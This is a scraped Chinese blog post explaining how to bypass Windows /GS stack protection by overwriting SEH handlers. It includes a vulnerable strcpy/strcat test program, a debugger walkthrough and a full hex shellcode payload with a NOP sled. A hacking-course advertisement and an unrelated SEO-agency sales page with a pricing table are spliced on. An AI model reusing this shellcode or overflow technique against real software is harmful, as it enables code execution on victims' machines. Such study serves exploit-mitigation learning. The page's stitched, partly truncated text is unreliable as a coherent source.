96SEO 2026-02-20 07:51 0
GS机制并没有对SEH提供保护#xff0c;换句话说我们可以通过攻击程序的异常处理达到绕…前言

本次文章只用于技术讨论学习切勿用于非法用途用于非法用途与本人无关
GS机制并没有对SEH提供保护换句话说我们可以通过攻击程序的异常处理达到绕过GS的目的。
我们首先通过超长字符串覆盖掉异常处理函数指针然后想办法触发一个异常程序就会转入异常处理由于异常处理函数指针已经被我们覆盖那么我们就可以通过劫持SEH来控制程序的后续流程。
作者rkabyss
Cookie是由.data段中第一个DWORD进行异或在程序运行时.data段第一个DWORD一般是随机的很难去预测它所以把他当成安全cookie去使用。
Cookie一般在进入到函数中后会放在下图当中位置如果要淹没返回地址一定会先淹没到Security
Cookie在执行到ret返回时程序会调用一个叫做check函数去检查有没有出现问题Security
Cookie在生成时会在栈里和.data段中各存放一个安全cookie在执行ret时check会对栈中和.data段中cookie进行比较如果不一样就判断程序被破坏说明栈发生了溢出。
Cookie随机性会用.data段第一个DWORD与栈中EBP进行异或操作当ret时调用check函数再将其异或回去。
Cookie代码中写了如过没有超过四字节是不会启动安全cookie的如果要启动只能通过#pragma
strict_gs_check(on)使其强制开启。
其实这也是绕过的一种方法。
123123123123123123123123123;vultest(str);return
Cookie生成的安全cookie放到了EAX寄存器中为了增加安全cookie随机性安全cookie又与EBP进行异或。
跳转到EBP可以看到00F3F92C为EBP下边009AD71E为返回地址。
安全cookie与EBP异或完将其放入到EBP-4位置在堆栈中可以看到。
通过上边代码可以看到copy的字符串远大于要传输的空间所以造成了栈溢出已将安全cookie、EBP、返回地址全部淹没。
如果正常情况下已经可以进行利用而有了安全cookie之后在下方使用check函数进行了判断判断异常直接飞掉。
在调用到check函数之前将安全cookie保存到了ECX中前面为了增加随机性进行了异或现在将其进行了恢复。
函数test中存在典型的栈溢出漏洞。
在strcpy操作后变量buf会被溢出当字符串足够长的时候程序的SEH异常处理句柄也会被淹没。
由于strcpy的溢出覆盖了input的地址会造成strcat从一个非法地址读取数据这时会触发异常程序转入异常处理这样就可以在程序检查Security
\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C
\x8B\xF4\x8D\x7E\xF4\x33\xDB\xB7\x04\x2B\xE3\x66\xBB\x33\x32\x53
\x68\x75\x73\x65\x72\x54\x33\xD2\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B
\x49\x1C\x8B\x09\x8B\x69\x08\xAD\x3D\x6A\x0A\x38\x1E\x75\x05\x95
\xFF\x57\xF8\x95\x60\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59
\x20\x03\xDD\x33\xFF\x47\x8B\x34\xBB\x03\xF5\x99\x0F\xBE\x06\x3A
\xC4\x74\x08\xC1\xCA\x07\x03\xD0\x46\xEB\xF1\x3B\x54\x24\x1C\x75
\xE4\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B\x59\x1C\x03\xDD\x03
\x2C\xBB\x95\x5F\xAB\x57\x61\x3D\x6A\x0A\x38\x1E\x75\xA9\x33\xDB
\x53\x68\x77\x65\x73\x74\x68\x66\x61\x69\x6C\x8B\xC4\x53\x50\x50
\x53\xFF\x57\xFC\x53\xFF\x57\xF8\x90\x90\x90\x90\x90\x90\x90\x90
\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
buf[200];strcpy(buf,input);strcat(buf,input);
}根据release中32程序规则主函数有三个参数判断下方call为主函数。
进入到主函数看到call其实就是test函数直接进入到test函数当中去。
可以看到整体逻辑如前面原理讲的一样首先获取到安全cookie保存到EAX当中并与EBP进行异或在结束时候又将其进行恢复。
执行到strcpy函数位置观察栈空间EBP-4位置为安全cookieEBP4为返回地址EBP8是参数。
后面ESP44为SE处理程序。
执行完strcpy函数观察栈空间发现SE处理程序地址已经被覆盖为shellcode起始地址。
执行到strcat函数观察到EBP8位置已经被覆盖EBP8是源字符串覆盖之后是一个不可访问地址。
执行strcat函数会直接进行异常处理因为源字符串为不可访问地址而异常处理地址为shellcode起始地址。
触发异常处理进入到shellcode当中接下来会运行shellcode代码。
现在很多程序都带有GS在分析程序的时候发现了缺陷却因为保护利用不了先掌握一些突破GS方法在之后遇到时能将其运用到之后会对其他一些突破方法进行复现。
③漏洞扫描、漏洞利用、原理利用方法、工具MSF、绕过IDS和反病毒侦察
④主机攻防演练MS17-010、MS08-067、MS10-046、MS12-20等
⑤Web漏洞原理与防御主动/被动攻击、DDOS攻击、CVE漏洞复现
④Web渗透工具Nmap、BurpSuite、SQLMap、其他菜刀、漏扫等
恭喜你如果学到这里你基本可以从事一份网络安全相关的工作比如渗透测试、Web
渗透、安全服务、安全分析等岗位如果等保模块学的好还可以从事等保工程师。
薪资区间6k-15k。
到此为止大概1个月的时间。
你已经成为了一名“脚本小子”。
那么你还想往下探索吗
想要入坑黑客网络安全的朋友给大家准备了一份282G全网最全的网络安全资料包免费领取
有了这些基础如果你要深入学习可以参考下方这个超详细学习路线图按照这个路线学习完全够支撑你成为一名优秀的中高级网络安全工程师
当然除了有配套的视频同时也为大家整理了各种文档和书籍资料工具并且已经帮大家分好类了。
作为专业的SEO优化服务提供商,我们致力于通过科学、系统的搜索引擎优化策略,帮助企业在百度、Google等搜索引擎中获得更高的排名和流量。我们的服务涵盖网站结构优化、内容优化、技术SEO和链接建设等多个维度。
| 服务项目 | 基础套餐 | 标准套餐 | 高级定制 |
|---|---|---|---|
| 关键词优化数量 | 10-20个核心词 | 30-50个核心词+长尾词 | 80-150个全方位覆盖 |
| 内容优化 | 基础页面优化 | 全站内容优化+每月5篇原创 | 个性化内容策略+每月15篇原创 |
| 技术SEO | 基本技术检查 | 全面技术优化+移动适配 | 深度技术重构+性能优化 |
| 外链建设 | 每月5-10条 | 每月20-30条高质量外链 | 每月50+条多渠道外链 |
| 数据报告 | 月度基础报告 | 双周详细报告+分析 | 每周深度报告+策略调整 |
| 效果保障 | 3-6个月见效 | 2-4个月见效 | 1-3个月快速见效 |
我们的SEO优化服务遵循科学严谨的流程,确保每一步都基于数据分析和行业最佳实践:
全面检测网站技术问题、内容质量、竞争对手情况,制定个性化优化方案。
基于用户搜索意图和商业目标,制定全面的关键词矩阵和布局策略。
解决网站技术问题,优化网站结构,提升页面速度和移动端体验。
创作高质量原创内容,优化现有页面,建立内容更新机制。
获取高质量外部链接,建立品牌在线影响力,提升网站权威度。
持续监控排名、流量和转化数据,根据效果调整优化策略。
基于我们服务的客户数据统计,平均优化效果如下:
我们坚信,真正的SEO优化不仅仅是追求排名,而是通过提供优质内容、优化用户体验、建立网站权威,最终实现可持续的业务增长。我们的目标是与客户建立长期合作关系,共同成长。
Demand feedback